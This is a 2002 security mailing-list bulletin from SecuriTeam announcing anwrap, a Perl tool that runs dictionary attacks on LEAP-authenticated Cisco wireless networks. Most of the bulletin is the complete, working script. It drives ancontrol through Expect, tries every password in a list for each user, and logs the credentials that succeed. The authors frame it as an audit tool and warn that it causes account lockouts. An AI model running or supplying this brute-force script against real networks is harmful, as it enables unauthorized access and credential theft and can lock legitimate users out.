[TOOL] anwrap, Dictionary Attack Tool against LEAP

From: support@securiteam.com
Date: 11/27/02

  • Next message: support@securiteam.com: "[EXPL] Calisto Internet Talker DoS" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 27 Nov 2002 01:25:27 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      anwrap, Dictionary Attack Tool against LEAP
    ------------------------------------------------------------------------

    DETAILS

    anwrap is a wrapper for ancontrol that serves as a dictionary attack tool
    against LEAP enabled Cisco Wireless Networks. It traverses a user list and
    password list attempting authentication and logging the results to a file.

    Tool code:
    #!/usr/bin/perl
    #
    # Version 0.1
    # anwrap.pl is a wrapper for ancontrol that serves as a Dictionary
    # attack tool against LEAP enabled Cisco Wireless Networks. Traverses
    # a user list and password list attempting authentication and logging the
    # results to a file. Really wrecks havoc on RADIUS calls to NT Networks
    that
    # have lockout policies in place, you have been warned. Tweak the
    Timeouts,
    # a lengthy LEAP timeout on the Cisco side could make for a very boring
    afternoon.
    # This tool was designed to audit authentication strengths before
    deploying LEAP in
    # a production environment.
    #
    # Needs ancontrol and some Perl stuff, hit up CPAN until the errors go
    away.
    # Tested on FreeBSD 4.7.
    #
    # General Usage : $0 <userfile> <passwordfile> <logfile>
    #
    # Brian Barto < brian@bartosoft.com > and Ron Sweeney < sween@modelm.org >
    # November 2K02
     

    use Expect ();

    if ($#ARGV<0) {
    &usage;
    }

    #setup some stuff

    $userfile =$ARGV[0];
    $passfile=$ARGV[1];
    $logfile = $ARGV[2];
    $date =`date`;

    open(GAR, $passfile) or die "can't open password file, $passfile";
    @GAR= <GAR>;

    open(USER, "<$userfile") or die;
    @users = <USER>;
    close(USER);

    open(FILE, ">>$logfile");
    print FILE "\n\nScript started at $date \n\n";
    close(FILE);

    foreach $user (@users)
    {
      chop($user);
      $auth_success = "no";
      $end_of_passwords = "no";
      $i = 0;
      while ($auth_success eq "no" && $end_of_passwords eq "no")
       {
        $pass = $GAR[$i];
        chop($pass);
        local $/;
        $p = Expect->spawn('ancontrol -L '.$user);
        $p->expect(5, "assw") || die "Never recieved LEAP password";
        print $p "$pass\r";
        print $pass,"\n";
        if ($p->expect(10, "uth"))
        {
          print "Success!\n";
          open(FILE, ">>$logfile") or die;
          print FILE "User: $user Password: $pass SUCCESS! ", "\n";
          close(FILE);
          $auth_success = "yes";
        }
        else
        {
          print "Failed\n";
          open(FILE, ">>$logfile") or die;
          print FILE "User: $user Password: $pass FAILED! ", "\n";
          close(FILE);
        }
        $p->close();
        if ($i == $#GAR) { $end_of_passwords = "yes"; }
        else { $i++; }
      }

    }
    sub usage {

    print "\nUsage : $0 <userfile> <passwordfile> <logfile>\n\n";
    print "Ron Sweeney <sween\@modelm.org>\n";
    print "Brian Barto <brian\@bartosoft.com>\n\n\n\n";
    exit;

    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:brian@bartosoft.com> Brian
    Barto and <mailto:sween@modelm.org> Ron Sweeney.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.